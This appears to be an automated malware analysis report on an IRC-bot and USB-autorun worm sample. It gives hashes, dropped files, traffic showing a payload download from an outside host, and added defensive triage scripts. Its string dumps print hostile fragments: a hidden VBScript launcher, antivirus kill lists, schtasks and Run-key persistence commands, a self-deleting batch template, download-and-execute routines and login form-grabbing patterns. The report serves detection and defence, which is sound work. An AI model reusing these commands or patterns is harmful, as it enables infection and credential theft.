Gen.Variant.Jaik.6139_8e5ce7cd70

by malwarelabrobot on March 13th, 2015 in Malware Descriptions.

Trojan.Win32.IRCbot.fjj (Kaspersky), Gen:Variant.Jaik.6139 (B) (Emsisoft), Gen:Variant.Jaik.6139 (AdAware), mzpefinder_pcap_file.YR, GenericAutorunWorm.YR, GenericIRCBot.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, WormAutorun, IRCBot


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 8e5ce7cd7044daa39916686cd403b95f
SHA1: f69321c4a99ac0401cfd34787842b5b7111bed5a
SHA256: 2374e6d9757f0081da79863ddb7167a0780d7c88285eceaa41085b36f23e4cd8
SSDeep: 49152:IfudTKzlmSzFWS 1sxgXDN4k92d97kiaKGejYcILoGDI1n:PdmzD NBYdffhGc1n
Size: 1780319 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: PC Utilities Software Limited
Created at: 2005-08-07 21:04:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour    Description
WormAutorun  A worm that spreads via removable drives: it writes its executable to every removable drive and creates an "autorun.inf" script there, so the file is executed when a user opens the drive in Windows Explorer.
IRCBot       A bot that communicates with its command-and-control server over an IRC channel.


Process activity

The Trojan creates the following process(es):

cCtWRS.exe:1936
lssis.exe:492
SdJshk.exe:1584
%original file name%.exe:1772

The Trojan injects its code into the following process(es). Note that "Svchost.exe" here is the dropped %Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (MD5 27c6d03b..., see Dropped PE files; the Svchost.exe_1924 string dump below carries its full path), named to pass for the Windows service host, not %SystemRoot%\System32\svchost.exe. The four instances run different payloads, as their string dumps show:

Svchost.exe:336
Svchost.exe:1924
Svchost.exe:1632
Svchost.exe:1456

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process cCtWRS.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (14 bytes)

The process lssis.exe:492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut7.tmp (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsTEFE.txt (3651 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fLBYTh (2161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (3057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut5.tmp (3057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SdJshk.exe (10322 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut6.tmp (2145 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsTEFE.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fLBYTh (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut6.tmp (0 bytes)

The process SdJshk.exe:1584 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (0 bytes)

The process %original file name%.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\QjlCDo (2161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EqEhol.txt (27193 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (3057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cCtWRS.exe (5161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (9845 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EqEhol.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\QjlCDo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (0 bytes)

Registry activity

The process cCtWRS.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

Note: none of the values recorded in this section is a persistence mechanism. HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed is rewritten by CryptoAPI whenever a process draws random bytes, and the MountPoints2\{...}\BaseClass = "Drive" entries are written by the shell when a process enumerates or touches drives through shell APIs, which matches the removable-drive scan described under Propagation. The Run keys, the Active Setup key and the "WindowsUpdate" scheduled task named in the string dumps are where persistence should be looked for; the sandbox did not record writes to them. The same values recur for each of the four processes below.

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 9B B7 2E AE BA 04 AF 60 B1 79 FB BA FE A2 9F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process lssis.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 7E FE 7D 44 00 59 82 73 48 07 8A E8 4A B0 07"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process SdJshk.exe:1584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 DC 14 34 AB AA 5C 79 C0 8C F9 95 C2 31 CB 54"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 D2 CC 07 92 B3 D7 4A C7 F5 50 36 93 19 29 9A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5                               File path
01d151ccd2a75bd713b8ce81d6509eb8  c:\Documents and Settings\"%CurrentUserName%"\Application Data\qjlcdo\cCtWRS.exe
01d151ccd2a75bd713b8ce81d6509eb8  c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SdJshk.exe
27c6d03bcdb8cfeb96b716f3d8be3e18  c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Svchost.exe
01d151ccd2a75bd713b8ce81d6509eb8  c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cCtWRS.exe
27c6d03bcdb8cfeb96b716f3d8be3e18  c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\explorer.exe
b3a0353a33887b610f17bb45c4e66957  c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\lssis.exe
b3a0353a33887b610f17bb45c4e66957  c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SQ1JWKKG\drop[1].exe

Only three distinct binaries are involved. 01d151... is the intermediate dropper (cCtWRS.exe and SdJshk.exe, plus the copy kept under Application Data\qjlcdo, a folder name that matches the QjlCDo temp file and the "cCtWRS.exe|EqEhol.txt|RYWNaI.exe|QjlCDo" field list in the Svchost.exe_336 dump below). 27c6d0... is the payload started under the names Svchost.exe and explorer.exe. b3a035... is the file fetched from hxxp://gonjeh.com/drop.exe (see Traffic), cached by WinINet as drop[1].exe and started as lssis.exe. The Temp copy of Svchost.exe is the one listed at 14 bytes in the file-activity log, so that size is what the sandbox recorded for the write, not the size of the image.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

The worm spreads via removable drives: it copies its executable to every removable drive and writes an "autorun.inf" script beside it, so the file is launched when a user opens the drive in Windows Explorer. This vector depends on AutoPlay honouring autorun.inf on USB media, which is the case on the Windows XP SP3 analysis system used here; Windows 7 and later, and XP/Vista with update KB971029 installed, ignore autorun.inf on removable drives (CD/DVD excepted), so on a patched system the copy runs only if the user opens it by hand. The string dumps below contain "autorun.inf" together with an "Icon=%SystemRoot%\system32\SHELL32.dll,7" entry, i.e. the dropped script also assigns the drive a stock Windows icon so that it looks benign.
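The following triage script is an added example, not code from the Lavasoft report or from the sample: it parses an autorun.inf the way a first responder would when pulling a suspect USB stick, and flags the launch keys, the borrowed shell icon and the spoofed action text that the string dumps above show this family using. The SAMPLE_AUTORUN text is constructed; the RECYCLER path and the junk line are assumptions about a typical worm-dropped file, not taken from this sample.

```python
"""Triage an autorun.inf found in the root of a removable drive.

Added example, not part of the Lavasoft report. SAMPLE_AUTORUN is constructed
to mirror the keys the report's string dumps name (open=, autorun.inf,
Icon=%SystemRoot%\\system32\\SHELL32.dll,7); the RECYCLER path and the junk
lines are assumptions about a typical worm-dropped file, not this sample's.
"""
import re

SAMPLE_AUTORUN = """[AutoRun]
;a strict INI parser would choke on the next line; worms pad files with junk
\x7f\x01\x02garbage without a delimiter
open=RECYCLER\\S-1-5-21-99\\Svchost.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,7
action=Open folder to view files
shell\\open\\command=RECYCLER\\S-1-5-21-99\\Svchost.exe
shell\\explore\\command=RECYCLER\\S-1-5-21-99\\Svchost.exe
UseAutoPlay=0
"""

# Keys through which autorun.inf can launch something.
LAUNCH_KEYS = ("open", "shellexecute")
EXEC_EXT = re.compile(r"\.(?:exe|scr|com|bat|cmd|pif|vbs|js)\b", re.IGNORECASE)
# shell32.dll icon indexes a worm borrows to look like a folder or a drive
# (assumption: the index list is a starting point, tune it to your environment).
STOCK_ICON = re.compile(r"shell32\.dll\s*,\s*(?:3|4|7|8)\b", re.IGNORECASE)


def parse_autorun(text):
    """Tolerant parse of the [autorun] section.

    Lines without '=' are skipped instead of aborting the parse, the first
    occurrence of a key wins, keys are lower-cased, values keep their case.
    """
    section, keys = None, {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            keys.setdefault(key.strip().lower(), value.strip())
    return keys


def triage(text):
    """Return human-readable findings; an empty list means nothing launch-capable."""
    keys = parse_autorun(text)
    findings = []
    for key, value in keys.items():
        # open=, shellexecute= and shell\<verb>\command= all run a program.
        if key in LAUNCH_KEYS or key.startswith("shell\\"):
            if EXEC_EXT.search(value):
                findings.append(f"{key}= launches a program on the drive: {value}")
    icon = keys.get("icon", "")
    if STOCK_ICON.search(icon):
        findings.append(f"icon= borrows a stock Windows folder/drive icon: {icon}")
    action = keys.get("action", "")
    if re.search(r"open folder|view files", action, re.IGNORECASE):
        findings.append(f"action= mimics Explorer's own AutoPlay entry: {action}")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_AUTORUN):
        print("!", finding)
```

The parser is deliberately not configparser: worms routinely pad autorun.inf with binary junk and odd section casing so that strict INI readers fail while Windows still honours the file. On a live drive, follow up by checking that the file each launch key points at exists and hashing it against the Dropped PE files list above.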

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3, 1, 1, 0
File Description:
Comments: http://www.autoitscript.com/autoit3/compiled.html
Language: English (United States)

The Comments URL is the marker the AutoIt3 compiler stamps into every compiled script, the File Version 3, 1, 1, 0 with a 2005 build timestamp matches the AutoIt 3.1.1 stub, and the autN.tmp files written to %Temp% are the temporary names AutoIt uses when a script unpacks files it carries. The outer layer is therefore an AutoIt dropper; PEiD signature matches such as UPolyX and Armadillo are frequently spurious on AutoIt-compiled binaries, and the low section entropies in the table below support that the image itself is not packed.

PE Sections

Name     Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text    4096             204454        204800    4.55587  58bf3c8238b3c5239b25ea2302dcd100
.rdata   208896           1804          2048      3.37209  577231055c37e031753652983a86fd15
.data    212992           93572         25088     2.54875  305b8ae7a143f90bb086012020d297d1
.idata   307200           8964          9216      3.84806  f720fa2e1d81f3c8880c453242cd9abd
.rsrc    319488           24576         23552     1.68417  dfd83b9b5a45cc2aa9ee380e93b46181

The five raw sizes add up to 264,704 bytes against a file size of 1,780,319 bytes: roughly 1.5 MB is not mapped by any section, i.e. it is overlay data appended after the image. The "Entropy: Packed" verdict above comes from that overlay, not from the sections (4.56 at most), which is where an older AutoIt stub carries its compiled script and any embedded files.

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL                         IP
hxxp://gonjeh.com/drop.exe  96.44.154.75
notorious.systems           209.123.52.34
www.dropbox.com             108.160.166.142

gonjeh.com served drop.exe (see Traffic) and is also the host of the gate.php URL in the Svchost.exe_1456 string dump; the Dropbox contact corresponds to the plugin.exe link in the same dump. The IDS verdicts show an IRC session, but the report does not record which of these hosts carried it.


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Likely Bot Nick in IRC (USA ..)
ET CURRENT_EVENTS SUSPICIOUS IRC - NICK and 3 Letter Country Code
ET CHAT IRC PRIVMSG command
ET CHAT IRC JOIN command
ET CHAT IRC NICK command
ET CHAT IRC USER command
ET CHAT IRC authorization message

Traffic

GET /drop.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gonjeh.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 Mar 2015 02:44:14 GMT
Content-Type: application/octet-stream
Content-Length: 757641
Last-Modified: Wed, 11 Mar 2015 20:15:20 GMT
Connection: keep-alive
ETag: "5500a258-b8f89"
Expires: Sat, 11 Apr 2015 02:44:14 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
[binary body: the report prints the start of the 757641-byte response as a hex/ASCII dump. It opens with an MZ/DOS header ("This program cannot be run in DOS mode"), a "Rich" linker signature and a PE header (the "L" after "PE" is the low byte of the i386 machine type 0x014C) followed by .text, .rdata and further section headers, i.e. a Win32 executable served as application/octet-stream. The download is the b3a035... file listed under Dropped PE files: WinINet cached it as Local Settings\Temporary Internet Files\Content.IE5\SQ1JWKKG\drop[1].exe and it was started as lssis.exe. The rest of the dump is omitted.]

<<< skipped >>>
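The check behind the report's "mzpefinder_pcap_file" verdict, i.e. spotting a Windows executable inside a captured HTTP body regardless of what the server labels it, as an added example that is not part of the Lavasoft report. The HTTP_RESPONSE below is constructed: its headers copy the drop.exe reply above, but the body is a synthetic minimal PE stub built by build_fake_pe(), not the real drop.exe.

```python
"""Carve PE images out of a captured HTTP response body.

Added example, not part of the Lavasoft report. The response is constructed:
headers copied from the report's drop.exe reply, body a synthetic PE stub.
"""
import re
import struct

MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0x01C4: "ARM", 0xAA64: "ARM64"}


def build_fake_pe():
    """Synthetic stub: DOS header whose e_lfanew points at 'PE\\0\\0' + COFF header."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)          # e_lfanew at offset 0x3C
    msg = b"This program cannot be run in DOS mode."
    dos[0x40:0x40 + len(msg)] = msg
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 2, 0, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff + b"\0" * 0xE0


FAKE_BODY = build_fake_pe()
HTTP_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: " + str(len(FAKE_BODY)).encode() + b"\r\n"
    b"\r\n"
) + FAKE_BODY


def split_http_response(raw):
    """Split status line and headers from the body; header names are lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def find_pe_images(data):
    """Every offset where an MZ stub's e_lfanew lands on a valid PE signature."""
    hits = []
    for m in re.finditer(b"MZ", data):
        off = m.start()
        if off + 0x40 > len(data):
            break
        e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
        pe = off + e_lfanew
        # Normal linkers place the signature past the 64-byte DOS header; crafted
        # tiny PEs that overlap the two headers are deliberately not matched here.
        if e_lfanew < 0x40 or pe + 24 > len(data) or data[pe:pe + 4] != b"PE\0\0":
            continue
        machine, nsections = struct.unpack_from("<HH", data, pe + 4)
        hits.append({"offset": off, "e_lfanew": e_lfanew,
                     "machine": MACHINES.get(machine, hex(machine)),
                     "sections": nsections})
    return hits


def triage_response(raw):
    """Flag an HTTP reply that carries a Windows executable, whatever its label."""
    status, headers, body = split_http_response(raw)
    hits = find_pe_images(body)
    if hits and hits[0]["offset"] == 0:
        verdict = "PE download"
    elif hits:
        verdict = "embedded PE"
    else:
        verdict = "no PE"
    return {
        "status": status,
        "content_type": headers.get("content-type", ""),
        "declared_length": int(headers.get("content-length", "0") or 0),
        "actual_length": len(body),
        "pe_images": hits,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(triage_response(HTTP_RESPONSE))
```

Matching on the MZ bytes alone would fire on every stray "MZ" in text; dereferencing e_lfanew and requiring the PE signature is what keeps the false-positive rate usable on a full pcap. Comparing declared and actual length also catches the truncated transfers that a sandbox often leaves behind.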

The Trojan connects to the servers at the following location(s): see the URLs table above.

Strings from Dumps

The dumps of the four Svchost.exe instances are where the family's capabilities show: a VBScript launcher stub, pipe-delimited builder settings (a fake "Microsoft Error" message, the names of the files each stage drops, a hXXp://gonjeh.com/gate.php gate URL), a kill list of security products, Run-key, Active Setup and schtasks persistence commands, form-grabbing URL patterns for Facebook, Live and PayPal logins, keylogger and webcam routines, the IRC protocol verbs (NICK, JOIN, PRIVMSG) and the autorun.inf template. Each process dump is followed by a dump of its RWX region at 0x00400000, which contains the same strings.

Svchost.exe_336:

`.rsrc
/%Di>
QsD.Os\
on error resume next:Set oShell = WScript.CreateObject ("WScript.Shell"):oShell.run "cmd.exe /C CD /D " & chr(34) & replace(WScript.ScriptFullName, WScript.ScriptName, "" ) & chr(34) & " && INTERPRETER.exe STB",vbhide
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
kernel32.dll
psapi.dll
MSVBVM60.dll
ntdll.dll
user32.dll
urlmon
URLDownloadToFileA
advapi32.dll
shell32.dll
ShellExecuteA
RegOpenKeyExA
RegCloseKey
FindExecutableA
VBA6.DLL
MasterKey
~&.Iu
.iI)'d
RV[.im
v.xWP
Mi%u{-7
.iJOY%
E.kkg
BT3 i%d
9u%xE;o
]JmSGxu_
.Im{y-
6-cKxv}
]-ukC}
?.kYV
7-Svo}{
.SJ}~_
.Vk(na
h.bI&
q*-.yZ
-msgm
x}.tsym
2%UKy?
o.Rkdy"
.gGZm
.Xzmi-Zz
;/%S|
w.QI6
j%.Wk
3].WV
.text
`.data
.rsrc
MSVBVM60.DLL
0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0||1|0|0||PA0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|PAhXXp://VVV.host.com/path/yourfile.exe|1|6199Microsoft Error|Microsoft Error|32|6199PcCtWRS.exe|EqEhol.txt|RYWNaI.exe|QjlCDo|
KERNEL32.DLL
NIS.exe
\Norton Internet Security\Engine\21.1.0.18\NIS.exe
egui.exe
\ESET\ESET NOD32 Antivirus\ecls.exe
avp.exe
\svchost.exe
bdagent.exe
\Bitdefender\Bitdefender 2015\certutil.exe
Avastui.exe
\AVAST Software\Avast\VisthAux.exe
\SysWOW64\svchost.exe
\System32\svchost.exe
cmd /c taskkill /F /pid
\net.exe
\se.exe
\file.txt
SELECT * FROM Win32_OperatingSystem
INTERPRETER.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
wscript.shell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
schtasks /delete /tn WindowsUpdate
cmd /c icacls
/deny %username%:F
\test.exe
\SkypeUpdates\skype.exe
media.exe
WScript.Shell
hXXps://twitter.com
SendKeys
hXXp://VVV.facebook.com
cmd.exe
C:\Windows\system32\cmd.exe
&& ping 127.0.0.1 && exit
consent.exe
athenahttpbotnet
VVV.update.microsoft.com
POST /%s HTTP/1
compatible; MSIE 7.0; Windows NT 5.1; SV1)
MapVirtualKeyA
SOFTWARE\Microsoft\Active Setup\Installed Components\%s
RegCreateKeyExA
\system\systwin32.exe
DownloadAndExecute
javaw.exe
GetKeyboardType
InternetOpenUrlA
PR_OpenTCPSocket
GdiplusShutdown
ole32.dll
HTTP/1.1
UnitKeylogger
GetKeyboardLayoutNameA
C:\Windows\tracing
C:\ProgramData\Microsoft\Network\Connections\Pbk
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
application/x-www-form-urlencoded
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
%WinDir%\SysWOW64\svchost.exe
Content-Length: %d
Keylogger
CryptDllConvertPublicKeyInfo
CryptDllEncodePublicKeyAndParameters
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
KeyHook
KeyboardHookDelegate
[BypassScreening]
HuntHTTPDownload
Webcam
Mozilla Firefox
TcpClient
KeyTLIST=b03
You need a registered nick to join that channel
flood.anope
InternetOpenUrlW
hXXp://VVV.gofuckbiz.com/
hXXp://kremlin.ru/
Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)
.fldr
cmd /c taskkill /F /PID
shell32.dll, 3
Scripting.FileSystemObject
autorun.inf
shell32.dll, 2
Icon=%SystemRoot%\system32\SHELL32.dll,7
shell32.dll, 0
\explorer.exe
Kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
\skype.exe
Project1.exe
\1.txt
\2.txt
Project1xp.exe

Svchost.exe_336_rwx_00400000_00122000:

(string dump of this RWX region is identical to the Svchost.exe_336 dump above and is not repeated)

Svchost.exe_1924:

`.rsrc
SSShD
j.Yf;
_tcPVj@
.PjRW
%s\%s
%s\removeMe%i%i%i%i.bat
del "%s">nul
ping 1.1.1.1 -w 5000 >nul
if exist "%s" goto Repeat
%s %s
%s %s "" "lol" :%s
%s %s %s
%s %s :%s
%s :%s
File downloaded and executed.
File downloaded, but execution failed.
File downloaded.Updating...
Software\Microsoft\Windows\CurrentVersion\Run\
%s:*:Enabled:%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
NICK
JOIN
PRIVMSG
4353453533
join
Microsoft Windows Hosting Service Login
explorer.exe
4.4.2
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Svchost.exe
GetWindowsDirectoryA
GetCPInfo
GetProcessHeap
RegCreateKeyExA
RegCloseKey
ShellExecuteA
URLDownloadToFileA
.text
`.rdata
@.data
.rsrc
[A%DtB
KeyE
URLW
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
KERNEL32.DLL
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
WS2_32.dll
kernel32.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian

Svchost.exe_1924_rwx_00400000_0002F000:

(string dump of this RWX region is identical to the Svchost.exe_1924 dump above and is not repeated)

Svchost.exe_1632:

`.rsrc
QsD.Os\
on error resume next:Set oShell = WScript.CreateObject ("WScript.Shell"):oShell.run "cmd.exe /C CD /D " & chr(34) & replace(WScript.ScriptFullName, WScript.ScriptName, "" ) & chr(34) & " && INTERPRETER.exe STB",vbhide
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
kernel32.dll
psapi.dll
MSVBVM60.dll
ntdll.dll
user32.dll
urlmon
URLDownloadToFileA
advapi32.dll
shell32.dll
ShellExecuteA
RegOpenKeyExA
RegCloseKey
FindExecutableA
VBA6.DLL
MasterKey
.text
`.data
.rsrc
MSVBVM60.DLL
0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0||1|0|0||PA0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|PAhXXp://VVV.host.com/path/yourfile.exe|1|6125Microsoft Error|Microsoft Error|32|6125PSdJshk.exe|TsTEFE.txt|HAljqB.exe|fLBYTh|
KERNEL32.DLL
NIS.exe
\Norton Internet Security\Engine\21.1.0.18\NIS.exe
egui.exe
\ESET\ESET NOD32 Antivirus\ecls.exe
avp.exe
\svchost.exe
bdagent.exe
\Bitdefender\Bitdefender 2015\certutil.exe
Avastui.exe
\AVAST Software\Avast\VisthAux.exe
\SysWOW64\svchost.exe
\System32\svchost.exe
cmd /c taskkill /F /pid
\net.exe
\se.exe
\file.txt
SELECT * FROM Win32_OperatingSystem
INTERPRETER.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
wscript.shell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
schtasks /delete /tn WindowsUpdate
cmd /c icacls
/deny %username%:F
\test.exe
\SkypeUpdates\skype.exe
media.exe
WScript.Shell
hXXps://twitter.com
SendKeys
hXXp://VVV.facebook.com
cmd.exe
C:\Windows\system32\cmd.exe
&& ping 127.0.0.1 && exit
consent.exe
athenahttpbotnet
VVV.update.microsoft.com
POST /%s HTTP/1
compatible; MSIE 7.0; Windows NT 5.1; SV1)
MapVirtualKeyA
SOFTWARE\Microsoft\Active Setup\Installed Components\%s
RegCreateKeyExA
\system\systwin32.exe
DownloadAndExecute
javaw.exe
GetKeyboardType
InternetOpenUrlA
PR_OpenTCPSocket
GdiplusShutdown
ole32.dll
HTTP/1.1
UnitKeylogger
GetKeyboardLayoutNameA
C:\Windows\tracing
C:\ProgramData\Microsoft\Network\Connections\Pbk
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
application/x-www-form-urlencoded
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
%WinDir%\SysWOW64\svchost.exe
Content-Length: %d
Keylogger
CryptDllConvertPublicKeyInfo
CryptDllEncodePublicKeyAndParameters
